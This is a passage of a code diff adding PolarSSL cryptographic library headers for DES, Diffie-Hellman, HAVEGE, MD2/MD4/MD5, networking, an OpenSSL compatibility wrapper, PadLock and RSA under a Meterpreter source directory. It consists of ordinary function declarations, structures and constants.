void des3_set3key_dec( des3_context *ctx, unsigned char key[24] );
/**
* \brief DES-ECB block encryption/decryption
*
* \param ctx DES context
* \param input 64-bit input block
* \param output 64-bit output block
*/
void des_crypt_ecb( des_context *ctx,
unsigned char input[8],
unsigned char output[8] );
/**
* \brief DES-CBC buffer encryption/decryption
*
* \param ctx DES context
* \param mode DES_ENCRYPT or DES_DECRYPT
* \param length length of the input data
* \param iv initialization vector (updated after use)
* \param input buffer holding the input data
* \param output buffer holding the output data
*/
void des_crypt_cbc( des_context *ctx,
int mode,
int length,
unsigned char iv[8],
unsigned char *input,
unsigned char *output );
/**
* \brief 3DES-ECB block encryption/decryption
*
* \param ctx 3DES context
* \param input 64-bit input block
* \param output 64-bit output block
*/
void des3_crypt_ecb( des3_context *ctx,
unsigned char input[8],
unsigned char output[8] );
/**
* \brief 3DES-CBC buffer encryption/decryption
*
* \param ctx 3DES context
* \param mode DES_ENCRYPT or DES_DECRYPT
* \param length length of the input data
* \param iv initialization vector (updated after use)
* \param input buffer holding the input data
* \param output buffer holding the output data
*/
void des3_crypt_cbc( des3_context *ctx,
int mode,
int length,
unsigned char iv[8],
unsigned char *input,
unsigned char *output );
/*
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int des_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* des.h */

140
c/meterpreter/source/common/polarssl/dhm.h Normal file

@ -0,0 +1,140 @@
/**
* \file dhm.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_DHM_H
#define POLARSSL_DHM_H
#include "polarssl/bignum.h"
#define POLARSSL_ERR_DHM_BAD_INPUT_DATA -0x0480
#define POLARSSL_ERR_DHM_READ_PARAMS_FAILED -0x0490
#define POLARSSL_ERR_DHM_MAKE_PARAMS_FAILED -0x04A0
#define POLARSSL_ERR_DHM_READ_PUBLIC_FAILED -0x04B0
#define POLARSSL_ERR_DHM_MAKE_PUBLIC_FAILED -0x04C0
#define POLARSSL_ERR_DHM_CALC_SECRET_FAILED -0x04D0
typedef struct
{
int len; /*!< size(P) in chars */
mpi P; /*!< prime modulus */
mpi G; /*!< generator */
mpi X; /*!< secret value */
mpi GX; /*!< self = G^X mod P */
mpi GY; /*!< peer = G^Y mod P */
mpi K; /*!< key = GY^X mod P */
mpi RP; /*!< cached R^2 mod P */
}
dhm_context;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief Parse the ServerKeyExchange parameters
*
* \param ctx DHM context
* \param p &(start of input buffer)
* \param end end of buffer
*
* \return 0 if successful, or an POLARSSL_ERR_DHM_XXX error code
*/
int dhm_read_params( dhm_context *ctx,
unsigned char **p,
unsigned char *end );
/**
* \brief Setup and write the ServerKeyExchange parameters
*
* \param ctx DHM context
* \param x_size private value size in bits
* \param output destination buffer
* \param olen number of chars written
* \param f_rng RNG function
* \param p_rng RNG parameter
*
* \note This function assumes that ctx->P and ctx->G
* have already been properly set (for example
* using mpi_read_string or mpi_read_binary).
*
* \return 0 if successful, or an POLARSSL_ERR_DHM_XXX error code
*/
int dhm_make_params( dhm_context *ctx, int s_size,
unsigned char *output, int *olen,
int (*f_rng)(void *), void *p_rng );
/**
* \brief Import the peer's public value G^Y
*
* \param ctx DHM context
* \param input input buffer
* \param ilen size of buffer
*
* \return 0 if successful, or an POLARSSL_ERR_DHM_XXX error code
*/
int dhm_read_public( dhm_context *ctx,
unsigned char *input, int ilen );
/**
* \brief Create own private value X and export G^X
*
* \param ctx DHM context
* \param x_size private value size in bits
* \param output destination buffer
* \param olen must be equal to ctx->P.len
* \param f_rng RNG function
* \param p_rng RNG parameter
*
* \return 0 if successful, or an POLARSSL_ERR_DHM_XXX error code
*/
int dhm_make_public( dhm_context *ctx, int s_size,
unsigned char *output, int olen,
int (*f_rng)(void *), void *p_rng );
/**
* \brief Derive and export the shared secret (G^Y)^X mod P
*
* \param ctx DHM context
* \param output destination buffer
* \param olen number of chars written
*
* \return 0 if successful, or an POLARSSL_ERR_DHM_XXX error code
*/
int dhm_calc_secret( dhm_context *ctx,
unsigned char *output, int *olen );
/*
* \brief Free the components of a DHM key
*/
void dhm_free( dhm_context *ctx );
/**
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int dhm_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif

62
c/meterpreter/source/common/polarssl/havege.h Normal file

@ -0,0 +1,62 @@
/**
* \file havege.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_HAVEGE_H
#define POLARSSL_HAVEGE_H
#define COLLECT_SIZE 1024
/**
* \brief HAVEGE state structure
*/
typedef struct
{
int PT1, PT2, offset[2];
int pool[COLLECT_SIZE];
int WALK[8192];
}
havege_state;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief HAVEGE initialization
*
* \param hs HAVEGE state to be initialized
*/
void havege_init( havege_state *hs );
/**
* \brief HAVEGE rand function
*
* \param rng_st points to an HAVEGE state
*
* \return A random int
*/
int havege_rand( void *p_rng );
#ifdef __cplusplus
}
#endif
#endif /* havege.h */

138
c/meterpreter/source/common/polarssl/md2.h Normal file

@ -0,0 +1,138 @@
/**
* \file md2.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_MD2_H
#define POLARSSL_MD2_H
/**
* \brief MD2 context structure
*/
typedef struct
{
unsigned char cksum[16]; /*!< checksum of the data block */
unsigned char state[48]; /*!< intermediate digest state */
unsigned char buffer[16]; /*!< data block being processed */
unsigned char ipad[64]; /*!< HMAC: inner padding */
unsigned char opad[64]; /*!< HMAC: outer padding */
int left; /*!< amount of data in buffer */
}
md2_context;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief MD2 context setup
*
* \param ctx context to be initialized
*/
void md2_starts( md2_context *ctx );
/**
* \brief MD2 process buffer
*
* \param ctx MD2 context
* \param input buffer holding the data
* \param ilen length of the input data
*/
void md2_update( md2_context *ctx, unsigned char *input, int ilen );
/**
* \brief MD2 final digest
*
* \param ctx MD2 context
* \param output MD2 checksum result
*/
void md2_finish( md2_context *ctx, unsigned char output[16] );
/**
* \brief Output = MD2( input buffer )
*
* \param input buffer holding the data
* \param ilen length of the input data
* \param output MD2 checksum result
*/
void md2( unsigned char *input, int ilen, unsigned char output[16] );
/**
* \brief Output = MD2( file contents )
*
* \param path input file name
* \param output MD2 checksum result
*
* \return 0 if successful, 1 if fopen failed,
* or 2 if fread failed
*/
int md2_file( char *path, unsigned char output[16] );
/**
* \brief MD2 HMAC context setup
*
* \param ctx HMAC context to be initialized
* \param key HMAC secret key
* \param keylen length of the HMAC key
*/
void md2_hmac_starts( md2_context *ctx, unsigned char *key, int keylen );
/**
* \brief MD2 HMAC process buffer
*
* \param ctx HMAC context
* \param input buffer holding the data
* \param ilen length of the input data
*/
void md2_hmac_update( md2_context *ctx, unsigned char *input, int ilen );
/**
* \brief MD2 HMAC final digest
*
* \param ctx HMAC context
* \param output MD2 HMAC checksum result
*/
void md2_hmac_finish( md2_context *ctx, unsigned char output[16] );
/**
* \brief Output = HMAC-MD2( hmac key, input buffer )
*
* \param key HMAC secret key
* \param keylen length of the HMAC key
* \param input buffer holding the data
* \param ilen length of the input data
* \param output HMAC-MD2 result
*/
void md2_hmac( unsigned char *key, int keylen,
unsigned char *input, int ilen,
unsigned char output[16] );
/**
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int md2_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* md2.h */

137
c/meterpreter/source/common/polarssl/md4.h Normal file

@ -0,0 +1,137 @@
/**
* \file md4.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_MD4_H
#define POLARSSL_MD4_H
/**
* \brief MD4 context structure
*/
typedef struct
{
unsigned long total[2]; /*!< number of bytes processed */
unsigned long state[4]; /*!< intermediate digest state */
unsigned char buffer[64]; /*!< data block being processed */
unsigned char ipad[64]; /*!< HMAC: inner padding */
unsigned char opad[64]; /*!< HMAC: outer padding */
}
md4_context;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief MD4 context setup
*
* \param ctx context to be initialized
*/
void md4_starts( md4_context *ctx );
/**
* \brief MD4 process buffer
*
* \param ctx MD4 context
* \param input buffer holding the data
* \param ilen length of the input data
*/
void md4_update( md4_context *ctx, unsigned char *input, int ilen );
/**
* \brief MD4 final digest
*
* \param ctx MD4 context
* \param output MD4 checksum result
*/
void md4_finish( md4_context *ctx, unsigned char output[16] );
/**
* \brief Output = MD4( input buffer )
*
* \param input buffer holding the data
* \param ilen length of the input data
* \param output MD4 checksum result
*/
void md4( unsigned char *input, int ilen, unsigned char output[16] );
/**
* \brief Output = MD4( file contents )
*
* \param path input file name
* \param output MD4 checksum result
*
* \return 0 if successful, 1 if fopen failed,
* or 2 if fread failed
*/
int md4_file( char *path, unsigned char output[16] );
/**
* \brief MD4 HMAC context setup
*
* \param ctx HMAC context to be initialized
* \param key HMAC secret key
* \param keylen length of the HMAC key
*/
void md4_hmac_starts( md4_context *ctx, unsigned char *key, int keylen );
/**
* \brief MD4 HMAC process buffer
*
* \param ctx HMAC context
* \param input buffer holding the data
* \param ilen length of the input data
*/
void md4_hmac_update( md4_context *ctx, unsigned char *input, int ilen );
/**
* \brief MD4 HMAC final digest
*
* \param ctx HMAC context
* \param output MD4 HMAC checksum result
*/
void md4_hmac_finish( md4_context *ctx, unsigned char output[16] );
/**
* \brief Output = HMAC-MD4( hmac key, input buffer )
*
* \param key HMAC secret key
* \param keylen length of the HMAC key
* \param input buffer holding the data
* \param ilen length of the input data
* \param output HMAC-MD4 result
*/
void md4_hmac( unsigned char *key, int keylen,
unsigned char *input, int ilen,
unsigned char output[16] );
/**
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int md4_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* md4.h */

137
c/meterpreter/source/common/polarssl/md5.h Normal file

@ -0,0 +1,137 @@
/**
* \file md5.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_MD5_H
#define POLARSSL_MD5_H
/**
* \brief MD5 context structure
*/
typedef struct
{
unsigned long total[2]; /*!< number of bytes processed */
unsigned long state[4]; /*!< intermediate digest state */
unsigned char buffer[64]; /*!< data block being processed */
unsigned char ipad[64]; /*!< HMAC: inner padding */
unsigned char opad[64]; /*!< HMAC: outer padding */
}
md5_context;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief MD5 context setup
*
* \param ctx context to be initialized
*/
void md5_starts( md5_context *ctx );
/**
* \brief MD5 process buffer
*
* \param ctx MD5 context
* \param input buffer holding the data
* \param ilen length of the input data
*/
void md5_update( md5_context *ctx, unsigned char *input, int ilen );
/**
* \brief MD5 final digest
*
* \param ctx MD5 context
* \param output MD5 checksum result
*/
void md5_finish( md5_context *ctx, unsigned char output[16] );
/**
* \brief Output = MD5( input buffer )
*
* \param input buffer holding the data
* \param ilen length of the input data
* \param output MD5 checksum result
*/
void md5( unsigned char *input, int ilen, unsigned char output[16] );
/**
* \brief Output = MD5( file contents )
*
* \param path input file name
* \param output MD5 checksum result
*
* \return 0 if successful, 1 if fopen failed,
* or 2 if fread failed
*/
int md5_file( char *path, unsigned char output[16] );
/**
* \brief MD5 HMAC context setup
*
* \param ctx HMAC context to be initialized
* \param key HMAC secret key
* \param keylen length of the HMAC key
*/
void md5_hmac_starts( md5_context *ctx, unsigned char *key, int keylen );
/**
* \brief MD5 HMAC process buffer
*
* \param ctx HMAC context
* \param input buffer holding the data
* \param ilen length of the input data
*/
void md5_hmac_update( md5_context *ctx, unsigned char *input, int ilen );
/**
* \brief MD5 HMAC final digest
*
* \param ctx HMAC context
* \param output MD5 HMAC checksum result
*/
void md5_hmac_finish( md5_context *ctx, unsigned char output[16] );
/**
* \brief Output = HMAC-MD5( hmac key, input buffer )
*
* \param key HMAC secret key
* \param keylen length of the HMAC key
* \param input buffer holding the data
* \param ilen length of the input data
* \param output HMAC-MD5 result
*/
void md5_hmac( unsigned char *key, int keylen,
unsigned char *input, int ilen,
unsigned char output[16] );
/**
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int md5_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* md5.h */

121
c/meterpreter/source/common/polarssl/net.h Normal file

@ -0,0 +1,121 @@
/**
* \file net.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_NET_H
#define POLARSSL_NET_H
#define POLARSSL_ERR_NET_UNKNOWN_HOST -0x0F00
#define POLARSSL_ERR_NET_SOCKET_FAILED -0x0F10
#define POLARSSL_ERR_NET_CONNECT_FAILED -0x0F20
#define POLARSSL_ERR_NET_BIND_FAILED -0x0F30
#define POLARSSL_ERR_NET_LISTEN_FAILED -0x0F40
#define POLARSSL_ERR_NET_ACCEPT_FAILED -0x0F50
#define POLARSSL_ERR_NET_RECV_FAILED -0x0F60
#define POLARSSL_ERR_NET_SEND_FAILED -0x0F70
#define POLARSSL_ERR_NET_CONN_RESET -0x0F80
#define POLARSSL_ERR_NET_TRY_AGAIN -0x0F90
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief Initiate a TCP connection with host:port
*
* \return 0 if successful, or one of:
* POLARSSL_ERR_NET_SOCKET_FAILED,
* POLARSSL_ERR_NET_UNKNOWN_HOST,
* POLARSSL_ERR_NET_CONNECT_FAILED
*/
int net_connect( int *fd, char *host, int port );
/**
* \brief Create a listening socket on bind_ip:port.
* If bind_ip == NULL, all interfaces are binded.
*
* \return 0 if successful, or one of:
* POLARSSL_ERR_NET_SOCKET_FAILED,
* POLARSSL_ERR_NET_BIND_FAILED,
* POLARSSL_ERR_NET_LISTEN_FAILED
*/
int net_bind( int *fd, char *bind_ip, int port );
/**
* \brief Accept a connection from a remote client
*
* \return 0 if successful, POLARSSL_ERR_NET_ACCEPT_FAILED, or
* POLARSSL_ERR_NET_WOULD_BLOCK is bind_fd was set to
* non-blocking and accept() is blocking.
*/
int net_accept( int bind_fd, int *client_fd, void *client_ip );
/**
* \brief Set the socket blocking
*
* \return 0 if successful, or a non-zero error code
*/
int net_set_block( int fd );
/**
* \brief Set the socket non-blocking
*
* \return 0 if successful, or a non-zero error code
*/
int net_set_nonblock( int fd );
/**
* \brief Portable usleep helper
*
* \note Real amount of time slept will not be less than
* select()'s timeout granularity (typically, 10ms).
*/
void net_usleep( unsigned long usec );
/**
* \brief Read at most 'len' characters. len is updated to
* reflect the actual number of characters read.
*
* \return This function returns the number of bytes received,
* or a negative error code; POLARSSL_ERR_NET_TRY_AGAIN
* indicates read() is blocking.
*/
int net_recv( void *ctx, unsigned char *buf, int len );
/**
* \brief Write at most 'len' characters. len is updated to
* reflect the number of characters _not_ written.
*
* \return This function returns the number of bytes sent,
* or a negative error code; POLARSSL_ERR_NET_TRY_AGAIN
* indicates write() is blocking.
*/
int net_send( void *ctx, unsigned char *buf, int len );
/**
* \brief Gracefully shutdown the connection
*/
void net_close( int fd );
#ifdef __cplusplus
}
#endif
#endif /* net.h */

131
c/meterpreter/source/common/polarssl/openssl.h Normal file

@ -0,0 +1,131 @@
/**
* \file openssl.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
/*
* OpenSSL wrapper contributed by David Barett
*/
#ifndef POLARSSL_OPENSSL_H
#define POLARSSL_OPENSSL_H
#include "polarssl/aes.h"
#include "polarssl/md5.h"
#include "polarssl/rsa.h"
#include "polarssl/sha1.h"
#define AES_SIZE 16
#define AES_BLOCK_SIZE 16
#define AES_KEY aes_context
#define MD5_CTX md5_context
#define SHA_CTX sha1_context
#define SHA1_Init( CTX ) \
sha1_starts( (CTX) )
#define SHA1_Update( CTX, BUF, LEN ) \
sha1_update( (CTX), (unsigned char *)(BUF), (LEN) )
#define SHA1_Final( OUT, CTX ) \
sha1_finish( (CTX), (OUT) )
#define MD5_Init( CTX ) \
md5_starts( (CTX) )
#define MD5_Update( CTX, BUF, LEN ) \
md5_update( (CTX), (unsigned char *)(BUF), (LEN) )
#define MD5_Final( OUT, CTX ) \
md5_finish( (CTX), (OUT) )
#define AES_set_encrypt_key( KEY, KEYSIZE, CTX ) \
aes_setkey_enc( (CTX), (KEY), (KEYSIZE) )
#define AES_set_decrypt_key( KEY, KEYSIZE, CTX ) \
aes_setkey_dec( (CTX), (KEY), (KEYSIZE) )
#define AES_cbc_encrypt( INPUT, OUTPUT, LEN, CTX, IV, MODE ) \
aes_crypt_cbc( (CTX), (MODE), (LEN), (IV), (INPUT), (OUTPUT) )
/*
* RSA stuff follows. TODO: needs cleanup
*/
inline int __RSA_Passthrough( void *output, void *input, int size )
{
memcpy( output, input, size );
return size;
}
inline rsa_context* d2i_RSA_PUBKEY( void *ignore, unsigned char **bufptr,
int len )
{
unsigned char *buffer = *(unsigned char **) bufptr;
rsa_context *rsa;
/*
* Not a general-purpose parser: only parses public key from *exactly*
* openssl genrsa -out privkey.pem 512 (or 1024)
* openssl rsa -in privkey.pem -out privatekey.der -outform der
* openssl rsa -in privkey.pem -out pubkey.der -outform der -pubout
*
* TODO: make a general-purpose parse
*/
if( ignore != 0 || ( len != 94 && len != 162 ) )
return( 0 );
rsa = (rsa_context *) malloc( sizeof( rsa_rsa ) );
if( rsa == NULL )
return( 0 );
memset( rsa, 0, sizeof( rsa_context ) );
if( ( len == 94 &&
mpi_read_binary( &rsa->N, &buffer[ 25], 64 ) == 0 &&
mpi_read_binary( &rsa->E, &buffer[ 91], 3 ) == 0 ) ||
( len == 162 &&
mpi_read_binary( &rsa->N, &buffer[ 29], 128 ) == 0 ) &&
mpi_read_binary( &rsa->E, &buffer[159], 3 ) == 0 )
{
/*
* key read successfully
*/
rsa->len = ( mpi_msb( &rsa->N ) + 7 ) >> 3;
return( rsa );
}
else
{
memset( rsa, 0, sizeof( rsa_context ) );
free( rsa );
return( 0 );
}
}
#define RSA rsa_context
#define RSA_PKCS1_PADDING 1 /* ignored; always encrypt with this */
#define RSA_size( CTX ) (CTX)->len
#define RSA_free( CTX ) rsa_free( CTX )
#define ERR_get_error( ) "ERR_get_error() not supported"
#define RSA_blinding_off( IGNORE )
#define d2i_RSAPrivateKey( a, b, c ) new rsa_context /* TODO: C++ bleh */
inline int RSA_public_decrypt ( int size, unsigned char* input, unsigned char* output, RSA* key, int ignore ) { int outsize=size; if( !rsa_pkcs1_decrypt( key, RSA_PUBLIC, &outsize, input, output ) ) return outsize; else return -1; }
inline int RSA_private_decrypt( int size, unsigned char* input, unsigned char* output, RSA* key, int ignore ) { int outsize=size; if( !rsa_pkcs1_decrypt( key, RSA_PRIVATE, &outsize, input, output ) ) return outsize; else return -1; }
inline int RSA_public_encrypt ( int size, unsigned char* input, unsigned char* output, RSA* key, int ignore ) { if( !rsa_pkcs1_encrypt( key, RSA_PUBLIC, size, input, output ) ) return RSA_size(key); else return -1; }
inline int RSA_private_encrypt( int size, unsigned char* input, unsigned char* output, RSA* key, int ignore ) { if( !rsa_pkcs1_encrypt( key, RSA_PRIVATE, size, input, output ) ) return RSA_size(key); else return -1; }
#ifdef __cplusplus
}
#endif
#endif /* openssl.h */

91
c/meterpreter/source/common/polarssl/padlock.h Normal file

@ -0,0 +1,91 @@
/**
* \file padlock.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_PADLOCK_H
#define POLARSSL_PADLOCK_H
#include "polarssl/aes.h"
#if defined(POLARSSL_HAVE_ASM) && defined(__GNUC__) && defined(__i386__)
#ifndef POLARSSL_HAVE_X86
#define POLARSSL_HAVE_X86
#endif
#define PADLOCK_RNG 0x000C
#define PADLOCK_ACE 0x00C0
#define PADLOCK_PHE 0x0C00
#define PADLOCK_PMM 0x3000
#define PADLOCK_ALIGN16(x) (unsigned long *) (16 + ((long) x & ~15))
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief PadLock detection routine
*
* \return 1 if CPU has support for the feature, 0 otherwise
*/
int padlock_supports( int feature );
/**
* \brief PadLock AES-ECB block en(de)cryption
*
* \param ctx AES context
* \param mode AES_ENCRYPT or AES_DECRYPT
* \param input 16-byte input block
* \param output 16-byte output block
*
* \return 0 if success, 1 if operation failed
*/
int padlock_xcryptecb( aes_context *ctx,
int mode,
unsigned char input[16],
unsigned char output[16] );
/**
* \brief PadLock AES-CBC buffer en(de)cryption
*
* \param ctx AES context
* \param mode AES_ENCRYPT or AES_DECRYPT
* \param length length of the input data
* \param iv initialization vector (updated after use)
* \param input buffer holding the input data
* \param output buffer holding the output data
*
* \return 0 if success, 1 if operation failed
*/
int padlock_xcryptcbc( aes_context *ctx,
int mode,
int length,
unsigned char iv[16],
unsigned char *input,
unsigned char *output );
#ifdef __cplusplus
}
#endif
#endif /* HAVE_X86 */
#endif /* padlock.h */

342
c/meterpreter/source/common/polarssl/rsa.h Normal file

@ -0,0 +1,342 @@
/**
* \file rsa.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_RSA_H
#define POLARSSL_RSA_H
#include "polarssl/bignum.h"
#define POLARSSL_ERR_RSA_BAD_INPUT_DATA -0x0400
#define POLARSSL_ERR_RSA_INVALID_PADDING -0x0410
#define POLARSSL_ERR_RSA_KEY_GEN_FAILED -0x0420
#define POLARSSL_ERR_RSA_KEY_CHECK_FAILED -0x0430
#define POLARSSL_ERR_RSA_PUBLIC_FAILED -0x0440
#define POLARSSL_ERR_RSA_PRIVATE_FAILED -0x0450
#define POLARSSL_ERR_RSA_VERIFY_FAILED -0x0460
#define POLARSSL_ERR_RSA_OUTPUT_TO_LARGE -0x0470
/*
* PKCS#1 constants
*/
#define RSA_RAW 0
#define SIG_RSA_MD2 2
#define SIG_RSA_MD4 3
#define SIG_RSA_MD5 4
#define SIG_RSA_SHA1 5
#define SIG_RSA_SHA224 14
#define SIG_RSA_SHA256 11
#define SIG_RSA_SHA384 12
#define SIG_RSA_SHA512 13
#define RSA_PUBLIC 0
#define RSA_PRIVATE 1
#define RSA_PKCS_V15 0
#define RSA_PKCS_V21 1
#define RSA_SIGN 1
#define RSA_CRYPT 2
#define ASN1_STR_CONSTRUCTED_SEQUENCE "\x30"
#define ASN1_STR_NULL "\x05"
#define ASN1_STR_OID "\x06"
#define ASN1_STR_OCTET_STRING "\x04"
#define OID_DIGEST_ALG_MDX "\x2A\x86\x48\x86\xF7\x0D\x02\x00"
#define OID_HASH_ALG_SHA1 "\x2b\x0e\x03\x02\x1a"
#define OID_HASH_ALG_SHA2X "\x60\x86\x48\x01\x65\x03\x04\x02\x00"
#define OID_ISO_MEMBER_BODIES "\x2a"
#define OID_ISO_IDENTIFIED_ORG "\x2b"
/*
* ISO Member bodies OID parts
*/
#define OID_COUNTRY_US "\x86\x48"
#define OID_RSA_DATA_SECURITY "\x86\xf7\x0d"
/*
* ISO Identified organization OID parts
*/
#define OID_OIW_SECSIG_SHA1 "\x0e\x03\x02\x1a"
/*
* DigestInfo ::= SEQUENCE {
* digestAlgorithm DigestAlgorithmIdentifier,
* digest Digest }
*
* DigestAlgorithmIdentifier ::= AlgorithmIdentifier
*
* Digest ::= OCTET STRING
*/
#define ASN1_HASH_MDX \
( \
ASN1_STR_CONSTRUCTED_SEQUENCE "\x20" \
ASN1_STR_CONSTRUCTED_SEQUENCE "\x0C" \
ASN1_STR_OID "\x08" \
OID_DIGEST_ALG_MDX \
ASN1_STR_NULL "\x00" \
ASN1_STR_OCTET_STRING "\x10" \
)
#define ASN1_HASH_SHA1 \
ASN1_STR_CONSTRUCTED_SEQUENCE "\x21" \
ASN1_STR_CONSTRUCTED_SEQUENCE "\x09" \
ASN1_STR_OID "\x05" \
OID_HASH_ALG_SHA1 \
ASN1_STR_NULL "\x00" \
ASN1_STR_OCTET_STRING "\x14"
#define ASN1_HASH_SHA2X \
ASN1_STR_CONSTRUCTED_SEQUENCE "\x11" \
ASN1_STR_CONSTRUCTED_SEQUENCE "\x0d" \
ASN1_STR_OID "\x09" \
OID_HASH_ALG_SHA2X \
ASN1_STR_NULL "\x00" \
ASN1_STR_OCTET_STRING "\x00"
/**
* \brief RSA context structure
*/
typedef struct
{
int ver; /*!< always 0 */
int len; /*!< size(N) in chars */
mpi N; /*!< public modulus */
mpi E; /*!< public exponent */
mpi D; /*!< private exponent */
mpi P; /*!< 1st prime factor */
